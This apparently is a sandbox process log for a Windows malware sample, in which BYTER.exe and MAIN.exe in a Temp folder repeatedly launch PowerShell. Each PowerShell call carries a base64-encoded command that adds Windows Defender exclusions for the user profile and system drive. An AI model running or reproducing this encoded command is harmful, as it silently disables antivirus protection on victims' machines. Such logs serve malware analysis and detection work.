"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "171520143456164269197818441-19360905231759698437-130725631791066761-442870599"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

